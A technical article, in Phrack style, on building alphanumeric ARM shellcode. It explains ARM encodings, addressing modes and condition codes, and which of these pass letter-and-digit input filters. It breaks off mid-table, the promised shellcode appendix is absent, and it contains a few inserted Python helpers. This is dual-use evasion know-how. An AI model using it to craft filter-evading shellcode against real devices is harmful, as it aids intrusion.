|=-------------------------------------------------------------------=|
|=-----------------=[ Alphanumeric RISC ARM Shellcode ]=-------------=|
|=-------------------------------------------------------------------=|
|=-------------------------------------------------------------------=|
|=--=[ Yves Younan (yyounan@fort-knox.org) / ace (ace@nologin.org]=--=|
|=----------=[ Pieter Philippaerts (pieter@mentalis.org) ]=----------=|
|=-------------------------------------------------------------------=|

0.- Introduction
1.- The ARM architecture
    1.0 - The ARM Processor
    1.1 - Coprocessors
    1.2 - Addressing Modes
    1.3 - Conditional Execution
    1.4 - Example Instructions
    1.5 - The Thumb Instruction Set
2.- Alphanumeric shellcode
    2.0 - Alphanumeric bit patterns
    2.1 - Addressing modes
    2.2 - Conditional Execution
    2.3 - The Instruction List
    2.4 - Getting a known value in a register
    2.5 - Writing to R0-R2
    2.6 - Self-modifying Code
    2.7 - The Instruction Cache
    2.8 - Going to Thumb Mode
    2.9 - Going to ARM mode
3.- Conclusion
4.- Acknowledgements
5.- References
A.- Shellcode Appendix
    A.0 - Writable Memory
    A.1 - Example Shellcode
    A.2 - Resulting Bytes

--[ 0.- Introduction

With the sudden explosion of mobile devices, the ARM processor has become one of the most widespread CPU cores in the world. ARM processors offer a good trade-off between power usage and processing power, which makes them excellent candidates for mobile and embedded devices. Most mobile phones and personal digital assistants feature an ARM processor. Only recently, however, have these devices become powerful enough to let users connect over the internet to various services, and to share information like we are used to on desktop PCs. Unfortunately, this introduces a number of security risks. Like PCs, native ARM applications are susceptible to attacks such as buffer overflows and other improper input validation abuse.
Since, until recently, only fully featured desktop computers were powerful enough to connect to the internet and disseminate information in a ubiquitous manner, most attacks have focused on the dominant desktop processor, the x86. Given the increased connectivity of ARM-based devices, and given the potential for misuse of these devices (for instance, by making a compromised phone dial commercial numbers), attacks on these devices will become much more common than is now the case.

A typical hurdle for exploit writers is that the shellcode has to pass one or more filtering methods before reaching the vulnerable buffer. A filtering method is a method that does some simple input validation, for instance by stringently checking that input matches a particular predefined pattern. A popular regular expression, for example, is [a-zA-Z0-9] (possibly extended with "space"). Intrusion detection systems are also adding more checks for particular patterns of opcodes to detect attacks against applications.

For educational purposes, we describe in this article how to write alphanumeric shellcode for ARM. This is important, because alphanumeric strings typically pass more of these validation checks and tend to survive more data transformations (such as conversions from one encoding to another) than non-alphanumeric shellcode. Writing alphanumeric shellcode was not considered easily doable on RISC architectures, which use 4-byte instructions.

When we discuss the bits in a byte, we use the following representation: the most significant bit is bit 7 and the least significant bit is bit 0. The first byte of an instruction is bits 31 to 24 and the last byte is bits 7 to 0.
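As a minimal sketch of the [a-zA-Z0-9] filter and of the byte numbering described above (Python; the helper names `instruction_bytes` and `is_alphanumeric` are our own illustration and do not come from the article), an instruction word can be split into its four bytes and checked like this:

```python
import string

# The byte values accepted by a [a-zA-Z0-9] filter.
ALNUM = set((string.ascii_letters + string.digits).encode("ascii"))


def instruction_bytes(word):
    """Split a 32-bit instruction word into four bytes.

    Follows the article's convention: the first byte is bits 31-24
    and the last byte is bits 7-0.
    """
    return [(word >> shift) & 0xFF for shift in (24, 16, 8, 0)]


def is_alphanumeric(word):
    """True if every byte of the word is a letter or a digit."""
    return all(b in ALNUM for b in instruction_bytes(word))


# A word whose four bytes spell "RA08" passes the filter.
print(instruction_bytes(0x52413038))  # [82, 65, 48, 56]
print(is_alphanumeric(0x52413038))    # True
# MOV r0, #0 with the AL condition (0xE3A00000) does not.
print(is_alphanumeric(0xE3A00000))    # False
```

The check is deliberately strict (exact character ranges); the bit-pattern rules given later in the article are a quicker, looser approximation of the same test.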
--[ 1.- The ARM architecture

----[ 1.0 The ARM Processor

The ARM architecture is a 32-bit RISC architecture with 16 general purpose registers available to regular programs and a status register (there are actually more general purpose registers and status registers, but those are only used in exception modes and are not important for our discussion). Every instruction is 4 bytes long, so we must ensure that all 4 of these bytes are alphanumeric. This is very different from the x86 architecture, which has variable length instructions. As a result, getting instructions to be completely alphanumeric is harder on ARM than on x86.

Registers R0 to R12 are real general purpose registers that do not have a dedicated purpose. Register R13 is used as a stack pointer and can also be referred to as register SP. Register R14 is used as the link register and is also referred to as LR. It contains the return address for functions and exceptions. Register R15 contains the current program counter and is also referred to as PC. Unlike on x86 architectures, we can directly read and write this register. Reading from this register returns the address of the currently executing instruction plus 8 bytes in ARM mode, or the address of the current instruction plus 4 bytes in Thumb mode (see section 1.5). Writing to this register causes execution to continue at the address written.
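The PC offset matters whenever shellcode addresses memory relative to R15. A small sketch of the arithmetic (Python; the function name and the address 0x8000 are hypothetical, chosen only for illustration):

```python
def pc_read_value(instr_addr, thumb=False):
    """Value observed when the instruction at instr_addr reads R15.

    ARM mode: address of the instruction + 8.
    Thumb mode: address of the instruction + 4.
    """
    return instr_addr + (4 if thumb else 8)


# Hypothetical instruction located at 0x8000.
print(hex(pc_read_value(0x8000)))              # 0x8008
print(hex(pc_read_value(0x8000, thumb=True)))  # 0x8004

# A PC-relative access with offset -48 from that ARM instruction
# therefore touches address 0x8008 - 48.
print(hex(pc_read_value(0x8000) - 48))         # 0x7fd8
```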
[Figure: block diagram of the ARM processor core. Labels recoverable from the original ASCII art: address bus A[31:0], address register, address incrementer, PC bus, incrementer bus, register bank (31 x 32-bit registers, 6 status registers), ALU bus, A bus, B bus, 32x8 multiplier, barrel shifter, 32-bit ALU, scan control, instruction decoder and control logic, write data register, instruction pipeline with read data register and Thumb instruction decoder, data bus D[31:0].]

There are many versions of the ARM processor, with version 6 adding a large amount of new instructions.
In this paper we try to remain as broad as possible: our alphanumeric ARM shellcode should work on all versions of the ARM processor. To this end, we will drop all instructions that require a specific version of a processor. However, we clearly note which instructions are dropped because they are not alphanumeric and which instructions are dropped because of compatibility constraints. This allows a shellcode writer who only needs compatibility with a specific processor version to take advantage of the extra instructions that may be available in that processor.

----[ 1.1 Coprocessors

ARM processors can be extended with a number of coprocessors to perform non-standard calculations and to avoid having to do these calculations in software. ARM supports up to 16 coprocessors, each of which has a unique identification number. Some coprocessors might need more than one identification number, in order to accommodate large instruction sets. Coprocessors are available for memory management, floating point operations, debugging, media, cryptography, and so on.

When an ARM processor encounters an instruction it cannot process, it sends the instruction out on the coprocessor bus. If a coprocessor recognizes the instruction, it can execute it and respond to the main processor. If none of the coprocessors respond, an 'illegal instruction' exception is raised.

----[ 1.2 Addressing Modes

ARM has different addressing modes. We'll briefly discuss the addressing modes which are useful for writing our shellcode.

----[ 1.2.0 Addressing modes for data processing

Most instructions will look like this:

    <opcode>{<cond>}{S} <Rd>, <Rn>, <shifter_operand>

For example:

    ADDEQ r0, r1, #20

The shifter_operand is the third argument to an instruction. It is 12 bits large and can be one of the following 11 possibilities. When a <shift_imm> is specified below, this is an immediate that is 5 bits large, meaning that it can be any value in the range of 0 to 31.

1. #immediate
   An immediate of 8 bits can be used as shifter operand. The 8-bit immediate can optionally be rotated right by an even amount, encoded in a 4-bit rotate field (the rotation applied is twice the value of that field).

2. <Rm>
   A register can be used as an argument.

3. <Rm>, LSL #<shift_imm>
   A register, which is logically shifted left by a shift_imm.

4. <Rm>, LSL <Rs>
   A register Rm is used as argument, shifted left by the amount held in a second register Rs.

5. <Rm>, LSR #<shift_imm>
   A register, which is logically shifted right by a shift_imm.

6. <Rm>, LSR <Rs>
   A register Rm is used as argument, shifted right by the amount held in a second register Rs.

7. <Rm>, ASR #<shift_imm>
   A register, which is arithmetically shifted right by a shift_imm.

8. <Rm>, ASR <Rs>
   A register, which is arithmetically shifted right by a register.

9. <Rm>, ROR #<shift_imm>
   A register, which is rotated right by a shift_imm.

10. <Rm>, ROR <Rs>
    A register, which is rotated right by a register.

11. <Rm>, RRX
    A register which is rotated right by one bit, with the carry flag replacing the free bit. The carry flag is then replaced with the bit which was rotated out.

----[ 1.2.1 Addressing modes for load/store word or unsigned byte

This is the general syntax for a load or store instruction:

    LDR{<cond>}{B}{T} <Rd>, addressing_mode

For example:

    LDRPLB r3, [r3, #-48]

Where addressing_mode is one of the following 6 possibilities. For the loads and stores with translation (e.g. LDRBT), only the last 3 addressing modes are possible. If an exclamation mark is specified at the end of the first 3 addressing modes (e.g. for addressing mode 1, [<Rn>, #+/-<imm_12>]!), then the calculated address is written back to Rn.

1. [<Rn>, #+/-<imm_12>]<!>
   Rn holds the base address of the memory location that Rd is loaded from or stored to. Optionally a 12-bit immediate can be used as offset. This offset is then added to (or subtracted from) the base address to calculate the address to access.

2. [<Rn>, +/-<Rm>]<!>
   Rn holds the base address of the memory location that Rd is loaded from or stored to, and Rm is used as offset for Rn.

3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!>
   Rn is the base address, with Rm as offset. The Rm register is shifted by applying the <shift> operation with a <shift_imm> as argument. <shift> is one of LSL, LSR, ASR, ROR or RRX.

The following three addressing modes are essentially the same as the above 3 addressing modes, except that they are post-indexed. That means that Rn is used as the memory location for the load or store. The calculation is done afterwards and written back into Rn.

4. [<Rn>], #+/-<imm_12>

5. [<Rn>], +/-<Rm>

6. [<Rn>], +/-<Rm>, <shift> #<shift_imm>

----[ 1.2.2 Addressing modes for load/store multiple

The general instruction syntax for multiple loads and stores looks like this:

    LDM{<cond>}<addressing_mode> <Rn>{!}, <registers>{^}

For example:

    LDMPLFA r5!, {r0, r1, r2, r6, r8, lr}

Addressing modes are one of the following 4 possibilities:

1. IA - Increment after
   In this addressing mode, Rn is used as the base address and as the first memory location to read from or write to. The subsequent addresses are calculated by incrementing the previous address by 4.

2. IB - Increment before
   In this addressing mode, Rn is used as the base address. The first memory location to read from or write to is the base address + 4. Subsequent addresses are also calculated by incrementing the previous address by 4.

3. DA - Decrement after
   Rn is used as the base address. The number of registers multiplied by 4 is subtracted from this base address, and then 4 is added to the result. This is used as the first memory location to read from or write to. Subsequent addresses are calculated by incrementing the previous address by 4.

4. DB - Decrement before
   Rn is used as the base address. The number of registers multiplied by 4 is subtracted from this base address. This is used as the first memory location to read from or write to. Subsequent addresses are calculated by incrementing the previous address by 4.
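The four load/store multiple modes differ only in where the first word lives. A minimal sketch of that calculation (Python; `ldm_addresses` and the base address 0x1000 are hypothetical names and values used for illustration):

```python
def ldm_addresses(mode, base, nregs):
    """Word addresses touched by LDM/STM, lowest address first.

    mode  -- one of "IA", "IB", "DA", "DB"
    base  -- value of Rn
    nregs -- number of registers in the register list
    """
    size = 4 * nregs
    if mode == "IA":
        start = base
    elif mode == "IB":
        start = base + 4
    elif mode == "DA":
        start = base - size + 4
    elif mode == "DB":
        start = base - size
    else:
        raise ValueError("unknown addressing mode: " + mode)
    # Subsequent addresses always increase by 4.
    return [start + 4 * i for i in range(nregs)]


for mode in ("IA", "IB", "DA", "DB"):
    print(mode, [hex(a) for a in ldm_addresses(mode, 0x1000, 3)])
# IA ['0x1000', '0x1004', '0x1008']
# IB ['0x1004', '0x1008', '0x100c']
# DA ['0xff8', '0xffc', '0x1000']
# DB ['0xff4', '0xff8', '0xffc']
```

In every mode the lowest-numbered register in the list corresponds to the lowest address.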
----[ 1.3 Conditional Execution

One of the features of the ARM processor is that it supports conditional execution of instructions. This means that the programmer can choose whether instructions will be executed or not, depending on the value of one of the status flags. This is useful in practice to write, for instance, short if structures in a more compact manner.

Almost all ARM instructions support conditional execution. The conditional execution of an instruction is represented by adding a suffix to the name of the instruction that denotes in which circumstances it will be executed. Without this suffix, the instruction will always be executed.

As a short example, consider the following C fragment:

    if (err != 0)
        printf("An error has occurred! Errorcode = %i\n", err);
    else
        printf("Everything is ok!\n");

GCC compiles the above code to:

            cmp     r1, #0
            beq     .L4
            ldr     r0, .L9
            bl      printf
            b       .L8
    .L4:
            ldr     r0, .L9+4
            bl      puts
    .L8:

With conditional execution, it could be rewritten as:

            cmp     r1, #0
            ldrne   r0, .L9
            blne    printf
            ldreq   r0, .L9+4
            bleq    puts

The 'ne' suffix means that the instruction will only be executed if the contents of, in this case, R1 are not equal to 0 (that is, if the preceding CMP left the Z flag clear). Similarly, the 'eq' suffix means that the instructions will be executed if the contents of R1 are equal to 0.

----[ 1.4 Example Instructions

ARM instructions are grouped into a number of categories, and each category has a similar bit layout. For illustration purposes, we will list and discuss some of these groups here. This list is not meant to be exhaustive or complete.

The first group of instructions are called 'data processing instructions'. This group covers a broad range of operations, which includes basic arithmetic and bitwise operations. Data processing instructions can be called with two registers as operands, or with a register and an immediate value. An example of each of these options is shown below.

     31 28 27 26 25 24  21 20 19 16 15 12 11         7 6   5 4 3 0
    +-----+--+--+--+------+--+-----+-----+------------+-----+-+---+
    |cond | 0| 0| 0|opcode| S| Rn  | Rd  |shift amount|shift|0| Rm|
    +-----+--+--+--+------+--+-----+-----+------------+-----+-+---+

    Example: SUBPL r6, pc, r5, ror #2
      0101 0 0 0 0010 0 1111 0110 00010 11 0 0101

     31  28 27 26 25 24  21 20 19  16 15  12 11   8 7            0
    +------+--+--+--+------+--+------+------+------+--------------+
    | cond | 0| 0| 1|opcode| S|  Rn  |  Rd  |rotate|  immediate   |
    +------+--+--+--+------+--+------+------+------+--------------+

    Example: SUBPL r3, r1, #56
      0101 0 0 1 0010 0 0001 0011 0000 00111000

A second set of important instructions are the instructions used to load values from memory into registers, and to store the result of calculations back into memory. In our shellcode, we will typically call them with an immediate offset as operand.

     31 28 27 26 25 24 23 22 21 20 19  16 15  12 11          0
    +-----+--+--+--+--+--+--+--+--+------+------+-------------+
    |cond | 0| 1| 0| P| U| B| W| L|  Rn  |  Rd  |  immediate  |
    +-----+--+--+--+--+--+--+--+--+------+------+-------------+

    Example: LDRMIB r3, [pc, #-48]
      0100 0 1 0 1 0 1 0 1 1111 0011 000000110000

An interesting alternative to loading and storing registers one at a time is to use the 'load/store multiple' instructions. The instructions in this group all load or store multiple registers at once. Bits 15 to 0 hold which registers will be operated on.

     31 28 27 26 25 24 23 22 21 20 19  16 15            0
    +-----+--+--+--+--+--+--+--+--+------+---------------+
    |cond | 1| 0| 0| P| U| S| W| L|  Rn  | register list |
    +-----+--+--+--+--+--+--+--+--+------+---------------+

    Example: STMMIFD r5, {r0, r3, r4, r6, r8, lr}^
      0100 1 0 0 1 0 1 0 0 0101 0100000101011001

The groups described in this section are only a small subset of the different instruction categories. However, these are the most important ones in the context of this article.
----[ 1.5 The Thumb Instruction Set

Thumb mode is a processor mode that is entered by setting the T bit of the CPSR register to 1. In this mode, the processor uses 16-bit instructions, which allows for better code density. Only T variants of the ARM processor support this mode (e.g. ARMv4T); however, as of ARMv6, Thumb support is mandatory.

Instructions executed in 32-bit mode are called ARM instructions, while instructions executed in 16-bit mode are called Thumb instructions.

Since instructions are only 2 bytes large in Thumb mode, it is easier to satisfy the alphanumeric constraints for instructions. To this end, we discuss how to get into Thumb mode from ARM mode in our shellcode. While our shellcode can run with only ARM instructions, writing code in Thumb mode is more convenient, resulting in fewer instructions and more compact shellcode. For programs already running in Thumb mode, we discuss a way of going back to ARM mode.

Unlike ARM instructions, Thumb instructions do not support conditional execution.

Given the fact that we can easily switch from ARM to Thumb and back, and that ARM mode can do everything that we need even if no Thumb mode is available, we achieve the broadest possible compatibility in our shellcode.

--[ 2.- Alphanumeric shellcode

----[ 2.0 Alphanumeric bit patterns

A common problem for exploit writers is that their shellcode has to survive one or more byte transformations before triggering the actual buffer overflow. These transformations could for instance be text encoding conversions, but could also be related to parsing or input validation. In most cases, alphanumeric bytes are likely to get through unmodified. Therefore, having shellcode with only alphanumeric instructions is sometimes necessary and often preferred.

An alphanumeric instruction is an instruction where each of the four bytes of the instruction is either an upper or lower case letter, or a digit.
In particular, the bit patterns of these bytes must always conform to the following constraints:

- Bit 7 must be set to 0
- Bit 6 or 5 must be set to 1
- If bit 5 is set, but bit 6 isn't, then bit 4 must also be set

These constraints do not eliminate all non-alphanumeric characters, but they can be used as a rule of thumb to quickly dismiss most of the invalid bytes. Each instruction has to be checked to determine whether, and under which circumstances, its bit pattern follows these conditions.

A potential problem for exploit writers is to get the return address to also be alphanumeric. This is not further discussed in this article, as it strongly depends on the situation.

----[ 2.1 Addressing modes

In this section we describe which addressing modes we can use while keeping our shellcode alphanumeric.

----[ 2.1.0 Addressing modes for data processing

1. #immediate

     11     8 7                   0
    +--------+---------------------+
    | rotate |        imm_8        |
    +--------+---------------------+

   Since we can fully control the value of imm_8, we can ensure that it is alphanumeric.

2. <Rm>

     11 10  9  8  7  6  5  4 3     0
    +--+--+--+--+--+--+--+--+-------+
    | 0| 0| 0| 0| 0| 0| 0| 0|  Rm   |
    +--+--+--+--+--+--+--+--+-------+

   Since bits 6 and 5 are both 0, this type of addressing mode can not be used in alphanumeric shellcode.

3. <Rm>, LSL #<shift_imm>

     11        7  6  5  4 3      0
    +-----------+--+--+--+--------+
    | shift_imm | 0| 0| 0|   Rm   |
    +-----------+--+--+--+--------+

   As in addressing mode 2, bits 6 and 5 are 0, so it can not be represented alphanumerically.

4. <Rm>, LSL <Rs>

     11        8  7  6  5  4 3      0
    +-----------+--+--+--+--+--------+
    |    Rs     | 0| 0| 0| 1|   Rm   |
    +-----------+--+--+--+--+--------+

   Again, bits 6 and 5 are 0, so this addressing mode can not be used.

5. <Rm>, LSR #<shift_imm>

     11        7  6  5  4 3      0
    +-----------+--+--+--+--------+
    | shift_imm | 0| 1| 0|   Rm   |
    +-----------+--+--+--+--------+

   Since bit 6 is 0, bits 5 and 4 would both have to be 1. Because only bit 5 is 1, we can not represent this addressing mode alphanumerically.

6. <Rm>, LSR <Rs>

     11        8  7  6  5  4 3      0
    +-----------+--+--+--+--+--------+
    |    Rs     | 0| 0| 1| 1|   Rm   |
    +-----------+--+--+--+--+--------+

   Bit 6 is 0, but since bits 5 and 4 are both set to 1, we can use this addressing mode in our alphanumeric shellcode. Register Rm must be less than R10.

7. <Rm>, ASR #<shift_imm>

     11        7  6  5  4 3      0
    +-----------+--+--+--+--------+
    | shift_imm | 1| 0| 0|   Rm   |
    +-----------+--+--+--+--------+

   Since bit 6 is set to 1, the only restriction on this addressing mode is that Rm can not be R0.

8. <Rm>, ASR <Rs>

     11        8  7  6  5  4 3      0
    +-----------+--+--+--+--+--------+
    |    Rs     | 0| 1| 0| 1|   Rm   |
    +-----------+--+--+--+--+--------+

   This bit pattern is alphanumeric as long as Rm is R10 or lower: the low byte is 0x50 + Rm, and the values 0x5B to 0x5F are not alphanumeric.

9. <Rm>, ROR #<shift_imm>

     11        7  6  5  4 3      0
    +-----------+--+--+--+--------+
    | shift_imm | 1| 1| 0|   Rm   |
    +-----------+--+--+--+--------+

   Bits 6 and 5 are both 1, so this pattern is alphanumeric as long as Rm is not R0 (the byte 0x60 is not alphanumeric).

10. <Rm>, ROR <Rs>

     11        8  7  6  5  4 3      0
    +-----------+--+--+--+--+--------+
    |    Rs     | 0| 1| 1| 1|   Rm   |
    +-----------+--+--+--+--+--------+

    Since bits 6, 5 and 4 are set to 1, Rm must be smaller than R11.

11. <Rm>, RRX

     11 10  9  8  7  6  5  4 3     0
    +--+--+--+--+--+--+--+--+-------+
    | 0| 0| 0| 0| 0| 1| 1| 0|  Rm   |
    +--+--+--+--+--+--+--+--+-------+

    As with addressing mode 9, this bit pattern is alphanumeric as long as Rm is not R0.

----[ 2.1.1 Addressing modes for load/store word or unsigned byte

1. [<Rn>, #+/-<imm_12>]<!>

     11                           0
    +------------------------------+
    |            imm_12            |
    +------------------------------+

   Since we can fully control the value of imm_12, we can ensure that it is alphanumeric.

2. [<Rn>, +/-<Rm>]<!>

     11 10  9  8  7  6  5  4 3     0
    +--+--+--+--+--+--+--+--+-------+
    | 0| 0| 0| 0| 0| 0| 0| 0|  Rm   |
    +--+--+--+--+--+--+--+--+-------+

   This addressing mode can not be represented alphanumerically.

3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!>

     11        7 6   5  4 3      0
    +-----------+-----+--+--------+
    | shift_imm |shift| 0|   Rm   |
    +-----------+-----+--+--------+

   - If shift is LSL, then bits 6 and 5 are 0. This is not alphanumeric.
   - If shift is LSR, then bit 6 is 0 and bit 5 is 1. But since bit 4 stays 0, it is not alphanumeric.
   - If shift is ASR, then bit 6 is 1 and bit 5 is 0. This means that it is alphanumeric as long as Rm is not R0.
   - If shift is ROR or RRX, then bits 6 and 5 will be 1, which is alphanumeric as long as Rm is not R0.

The post-indexing addressing modes discussed above have essentially the same bit layout for the last 12 bits. They only differ in that these modes will unset bit 24 in the load or store instruction.

----[ 2.1.2 Addressing modes for load/store multiple

The increment addressing modes will set bit 23 in the load or store instruction, while the decrement modes will unset bit 23. If bit 23 is set, then the instruction can not be represented alphanumerically. So only the decrement addressing modes can be used in alphanumeric shellcode.

----[ 2.2 Conditional Execution

Because the condition code of an instruction is encoded in the most significant bits of the first byte of the instruction (bits 31-28), the value of the condition code has a direct impact on the alphanumeric properties of the instruction. As a result, only a limited set of condition codes can be used in alphanumeric shellcode. The table below lists all the condition codes and their corresponding bit pattern:

    [bitpattern]  [name]  [description]
    0000          EQ      Equal
    0001          NE      Not equal
    0010          CS/HS   Carry set/unsigned higher or same
    0011          CC/LO   Carry clear/unsigned lower
    0100          MI      Minus/negative
    0101          PL      Plus/positive or zero
    0110          VS      Overflow
    0111          VC      No overflow
    1000          HI      Unsigned higher
    1001          LS      Unsigned lower or same
    1010          GE      Signed greater than or equal
    1011          LT      Signed less than
    1100          GT      Signed greater than
    1101          LE      Signed less than or equal
    1110          AL      Always (unconditional)
    1111          -       (used for other purposes)
    |  |
    |  bit28
    bit31

Remember that the most significant bit of a byte should always be set to 0 in order to be alphanumeric, so this excludes the last eight condition codes.
In addition, the resulting byte must be at least 0x30, so this excludes the first three condition codes too. Unfortunately, 'AL' is one of the codes that cannot be used in alphanumeric shellcode. This means that all ARM instructions must be executed conditionally.

In this article, we choose PL and MI as the two condition codes that we will use. They are mutually exclusive and together cover every case (exactly one of them holds for any value of the N flag), so we can always ensure that an instruction gets executed by simply adding the same instruction twice to the shellcode, once with the PL suffix and once with the MI suffix.

----[ 2.3 The Instruction List

In our list of instructions, we make a distinction between SZ/SO (should be zero/should be one) and IZ/IO (is zero/is one). We do this because the ARM reference manual specifies that specific bits must be set to 0 or 1 and others "should be" set to 0 or 1 (defined as SBZ or SBO in the manual). However, on our test processor, if we set a bit marked as "should be" to something else, the processor throws an undefined instruction exception. As such, we've considered "should be" and "must be" to be equivalent for our discussion, but we note the difference in case this behavior is different on other processors (since this would allow us to use many more instructions).

The table below lists all the instructions present in ARMv6. For each instruction, we've checked some simple constraints that may not be broken in order for the instruction to be alphanumeric. The main focus of this table is the high order bits of the second byte of the instruction (bits 23 to 20). Only the high order bits of this byte are included, because the high order bits of the first byte are set by the condition flags, and the high order bits of the third and fourth byte are often set by the operands of the instruction. When the table contains the value 'd' for a bit, it means that the value of this bit depends on specific settings.
The final column contains a list of things that disqualify the instruction for being used in alphanumeric shellcode. Disqualification criteria are that at least one of the four bytes of the instruction is either always too high to be alphanumeric, or too low. In this column, the following conventions are used:

- 'IO' is used to indicate that one or more bits is always 1
- 'IZ' is used to indicate that one or more bits is always 0
- 'SO' is used to indicate that one or more bits should be 1
- 'SZ' is used to indicate that one or more bits should be 0

+-----------+--------+--+--+--+--+---------------------------+
|instruction|version |23|22|21|20|disqualifiers              |
+-----------+--------+--+--+--+--+---------------------------+
|ADC        |        |1 |0 |1 |d |IO: 23                     |
|ADD        |        |1 |0 |0 |d |IO: 23                     |
|AND        |        |0 |0 |0 |d |IZ: 23-21                  |
|B, BL      |        |d |d |d |d |                           |
|BIC        |        |1 |1 |0 |d |IO: 23                     |
|BKPT       |5+      |0 |0 |1 |0 |IO: 31, IZ: 22, 20         |
|BLX (1)    |5+      |d |d |d |d |IO: 31                     |
|BLX (2)    |5+      |0 |0 |1 |0 |SO: 15, IZ: 22, 20         |
|BX         |4T, 5+  |0 |0 |1 |0 |IO: 7, SO: 15, IZ: 22, 20  |
|BXJ        |5TEJ, 6+|0 |0 |1 |0 |SO: 15, IZ: 22, 20, 6, 4   |
|CDP        |        |d |d |d |d |                           |
|CLZ        |5+      |0 |1 |1 |0 |IZ: 7-5                    |
|CMN        |        |0 |1 |1 |1 |SZ: 15-13                  |
|CMP        |        |0 |1 |0 |1 |SZ: 15-13                  |
|CPS        |6+      |0 |0 |0 |0 |SZ: 15-13, IZ: 22-20       |
|CPY        |6+      |1 |0 |1 |0 |IZ: 22, 20, 7-5, IO: 23    |
|EOR        |        |0 |0 |1 |d |                           |
|LDC        |        |d |d |d |1 |                           |
|LDM (1)    |        |d |0 |d |1 |                           |
|LDM (2)    |        |d |1 |0 |1 |                           |
|LDM (3)    |        |d |1 |d |1 |IO: 15                     |
|LDR        |        |d |0 |d |1 |                           |
|LDRB       |        |d |1 |d |1 |                           |
|LDRBT      |        |0 |1 |1 |1 |                           |
|LDRD       |5TE+    |d |d |d |0 |                           |
|LDREX      |6+      |1 |0 |0 |1 |IO: 23, 7                  |
|LDRH       |        |d |d |d |1 |IO: 7                      |
|LDRSB      |4+      |d |d |d |1 |IO: 7                      |
|LDRSH      |4+      |d |d |d |1 |IO: 7                      |
|LDRT       |        |d |0 |1 |1 |                           |
|MCR        |        |d |d |d |0 |                           |
|MCRR       |5TE+    |0 |1 |0 |0 |                           |
|MLA        |        |0 |0 |1 |d |IO: 7                      |
|MOV        |        |1 |0 |1 |d |IO: 23                     |
|MRC        |        |d |d |d |1 |                           |
|MRRC       |5TE+    |0 |1 |0 |1 |                           |
|MRS        |        |0 |d |0 |0 |SZ: 7-0                    |
|MSR        |        |0 |d |1 |0 |SO: 15                     |
|MUL        |        |0 |0 |0 |d |IO: 7                      |
|MVN        |        |1 |1 |1 |d |IO: 23                     |
|ORR        |        |1 |0 |0 |d |IO: 23                     |
|PKHBT      |6+      |1 |0 |0 |0 |IO: 23                     |
|PKHTB      |6+      |1 |0 |0 |0 |IO: 23                     |
|PLD        |5TE+,   |d |1 |0 |1 |IO: 15                     |
|           |!5TExP  |  |  |  |  |                           |
|QADD       |5TE+    |0 |0 |0 |0 |IZ: 22-21                  |
|QADD16     |6+      |0 |0 |1 |0 |IZ: 22, 20                 |
|QADD8      |6+      |0 |0 |1 |0 |IZ: 22, 20, IO: 7          |
|QADDSUBX   |6+      |0 |0 |1 |0 |IZ: 22, 20                 |
|QDADD      |5TE+    |0 |1 |0 |0 |                           |
|QDSUB      |5TE+    |0 |1 |1 |0 |                           |
|QSUB       |5TE+    |0 |0 |1 |0 |IZ: 22, 20                 |
|QSUB16     |6+      |0 |0 |1 |0 |IZ: 22, 20                 |
|QSUB8      |6+      |0 |0 |1 |0 |IZ: 22, 20, IO: 7          |
|QSUBADDX   |6+      |0 |0 |1 |0 |IZ: 22, 20                 |
|REV        |6+      |1 |0 |1 |1 |IO: 23                     |
|REV16      |6+      |1 |0 |1 |1 |IO: 23, 7                  |
|REVSH      |6+      |1 |1 |1 |1 |IO: 23, 7                  |
|RFE        |6+      |d |0 |d |1 |SZ: 14-13, 6-5             |
|RSB        |        |0 |1 |1 |d |                           |
|RSC        |        |1 |1 |1 |d |IO: 23                     |
|SADD16     |6+      |0 |0 |0 |1 |IZ: 22-21                  |
|SADD8      |6+      |0 |0 |0 |1 |IZ: 22-21, IO: 7           |
|SADDSUBX   |6+      |0 |0 |0 |1 |IZ: 22-21                  |
|SBC        |        |1 |1 |0 |d |IO: 23                     |
|SEL        |6+      |1 |0 |0 |0 |IO: 23                     |
|SETEND     |6+      |0 |0 |0 |0 |SZ: 14-13, IZ: 22-21, 6-5  |
|SHADD16    |6+      |0 |0 |1 |1 |IZ: 6-5                    |
|SHADD8     |6+      |0 |0 |1 |1 |IO: 7                      |
|SHADDSUBX  |6+      |0 |0 |1 |1 |                           |
|SHSUB16    |6+      |0 |0 |1 |1 |                           |
|SHSUB8     |6+      |0 |0 |1 |1 |IO: 7                      |
|SHSUBADDX  |6+      |0 |0 |1 |1 |                           |
|SMLA<x><y> |5TE+    |0 |0 |0 |0 |IO: 7, IZ: 22-21           |
|SMLAD      |6+      |0 |0 |0 |0 |IZ: 22-21                  |
|SMLAL      |        |1 |1 |1 |d |IO: 23, 7                  |
|SMLAL<x><y>|5TE+    |0 |1 |0 |0 |IO: 7                      |
|SMLALD     |6+      |0 |1 |0 |0 |                           |
|SMLAW<y>   |5TE+    |0 |0 |1 |0 |IZ: 22, 20, IO: 7          |
|SMLSD      |6+      |0 |0 |0 |0 |IZ: 22-21                  |
|SMLSLD     |6+      |0 |1 |0 |0 |                           |
|SMMLA      |6+      |0 |1 |0 |1 |                           |
|SMMLS      |6+      |0 |1 |0 |1 |IO: 7                      |
|SMMUL      |6+      |0 |1 |0 |1 |IO: 15                     |
|SMUAD      |6+      |0 |0 |0 |0 |IZ: 22-21, IO: 15          |
|SMUL<x><y> |5TE+    |0 |1 |1 |0 |SZ: 15, IO: 7              |
|SMULL      |        |1 |1 |0 |d |IO: 23                     |
|SMULW<x><y>|5TE+    |0 |0 |1 |0 |IZ: 22, 20,SZ: 14-13, IO: 7|
|SMUSD      |6+      |0 |0 |0 |0 |IZ: 22-21, IO: 15          |
|SRS        |6+      |d |1 |d |0 |SZ: 14-13, 6-5             |
|SSAT       |6+      |1 |0 |1 |d |IO: 23                     |
|SSAT16     |6+      |1 |0 |1 |0 |IO: 23                     |
|SSUB16     |6+      |0 |0 |0 |1 |IZ: 22-21                  |
|SSUB8      |6+      |0 |0 |0 |1 |IZ: 22-21, IO: 7           |
|SSUBADDX   |6+      |0 |0 |0 |1 |IZ: 22-21                  |
|STC        |2+      |d |d |d |0 |                           |
|STM (1)    |        |d |0 |d |0 |IZ: 22, 20                 |
|STM (2)    |        |d |1 |0 |0 |                           |
|STR        |        |d |0 |d |0 |IZ: 22, 20                 |
|STRB       |        |d |1 |d |0 |                           |
|STRBT      |        |d |1 |1 |0 |                           |
|STRD       |5TE+    |d |d |d |0 |IO: 7                      |
|STREX      |6+      |1 |0 |0 |0 |IO: 7                      |
